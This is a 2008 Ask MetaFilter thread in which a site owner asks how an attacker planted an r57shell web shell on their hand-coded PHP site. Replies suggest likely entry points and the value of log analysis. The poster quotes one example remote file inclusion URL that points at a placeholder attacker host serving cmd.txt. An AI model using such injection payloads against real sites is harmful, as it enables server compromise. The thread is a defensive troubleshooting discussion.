Join 3,418 readers in helping fund MetaFilter (Hide)


hacked again
May 5, 2008 8:43 PM   Subscribe

Site hacked again 4 years later. I need some advice.

So about 4 years I asked this question. Nothing much happened to my site then other than a index.html file was created which defaced my site.
Then today I get a not too official email from paypal telling me my site has been compromised. The email looked weird and had a url in it within my site. I open a new tab hand type the url and it exists.
I ssh into my site ls -alt to find most recent changes. I had not done anything in 2008 so it was really obvious what was new and modified. So I clean up the mess and change login info.
I renamed and moved the new files so I could look at them and find r57shell was used. mail logs have tons of out going.
The oldest file that was changed was from end of Jan 08. My logs only go back to mid March, so I can not see what got through. I had changed my old code to ignore variables with www or http. I do have awstats which I perused through pages/urls to see if anything in Jan stuck out. Nothing did.
I'm going to redo the site completely, but wonder how they got in.
And paypal/ebay asked me to help by giving them any logs that might help them.
posted by sailormouth to Computers & Internet (14 answers total)
 
It may just be me, but where is the question?
posted by petethered at 9:28 PM on May 5, 2008


I think he's looking for advice on figuring out how the cracker got in, given the audit trail is kinda cold.
posted by hattifattener at 9:35 PM on May 5, 2008


Long day.
Yes, I am looking for advice as to where I might find a clue to what exactly the weakness was this time.
No raw logs from the time it happened.
Got awstats, but I am not seeing anything obvious.
Did not find much useful info about how r57shell could get installed.
posted by sailormouth at 9:39 PM on May 5, 2008


Was awstats installed at the time? I've seen awstats used as an attack vector.
posted by easyasy3k at 9:54 PM on May 5, 2008


Yes, awstats was installed and running.
posted by sailormouth at 10:13 PM on May 5, 2008


Does this help?

http://www.phpbuilder.com/board/showthread.php?t=10335348
posted by mattoxic at 10:25 PM on May 5, 2008


Actually I did read that thread before I posted.
I am hosted on 1and1 so I have no control on the php config.
The talk in that thread as far as not allowing outside sites to pipe through (www.mysite.com/index.php?var=http://www.badguysite.com/gotcha/cmd.txt) your site is what I did 4 years ago, and had not had any problems until now.
When I would check the stats, either from 1and1 or awstats, I could see attempts at that, but my code would ignore vars pointing from outside my site. I only had one var.
posted by sailormouth at 10:41 PM on May 5, 2008


There are 3 main possibilities:
1. Your app is vulnerable.
2. Third party software you're using is vulnerable.
3. Something else on the box that's nothing to do with you got hacked.

If you're on bog-standard shared hosting then (3) is fairly likely, as it only takes one of the hundreds of other sites on the server to offer a way in and then a privilege escalation will allow them to deface everything. A couple of my clients with sites on shared hosting got affected in this way recently.

However, you should also check your awstats is up to date, and are you absolutely sure the change to your app blocks all malicious uses? Make sure you use a whitelist instead of just blacklisting a few strings.
posted by malevolent at 12:38 AM on May 6, 2008


What is your site built on? Are you using WordPress, Joomla, Drupal, anything other than plain old HTML?
posted by DarlingBri at 2:33 AM on May 6, 2008


Though 3 could be possible I am pretty sure I had a vulnerability mostly because when we added my wife's domain to our plan 1and1 created her space one level above mine. So in the filesystem structure they would have to go through her site to get to mine. Nothing was touched in her files.
The hosting is shared linux box. Handcoded php and html.
posted by sailormouth at 6:29 AM on May 6, 2008


Creating good passwords and changing them regularly?
posted by loiseau at 6:38 AM on May 6, 2008


I have copied all the logs I have to look at on downtime at work.
posted by sailormouth at 6:58 AM on May 6, 2008


FWIW I found the secutiry hole in one of my sites after a similar attack, by looking at the log files and seeing the types of attacks that were coming in (quite literally hundreds per day).

They are just trying different things, fishing for vulnerabilities, so it was pretty easy to see that most of them were trying to reach files/directories that didn't even exist.

However, any that were reaching an actual file, I would just copy & paste that into my browser and try it (most were trying to load some malicious file, like your example above, so obviously I would modify it slightly so as not to actually load the malicious file). Lo and behold and much to my amazement, one of these attacks actually work.

It was a bug I thought I had patched, but (obviously) hadn't.

Point is, by looking at the log files--not even necessarily the ones from months ago when the attack happened, maybe just from the log files for the last couple of weeks--you can get a grasp of the type of attacks that are directed at your site & that may lead to some ideas about how to address the issues.

Another possible vector is lots of viruses/malware nowadays will go through your hard drive and add a bit of malicious code into each html or php file it finds. When you upload this corrupted file to your web site the problems begin.

So--check your home computer for viruses/malware and also, check the files/source code that are actually on your web site to make sure there are no added funny bits.
posted by flug at 11:25 AM on May 6, 2008


Well after spending some time looking through the logs I think I found what they did.
It looks like they pointed to their file to get info on ftp, not a http or www which was what I was looking for in var. Logs are always full of www and http so I did not see the ftp at first.
flug, yes I test by plugging in their variations, but substituting safe files.
Thank you everyone for your input.
posted by sailormouth at 3:00 PM on May 6, 2008


« Older [ParanoiaFilter] How can I tel...   |  Where on the Web can I find a ... Newer »
This thread is closed to new comments.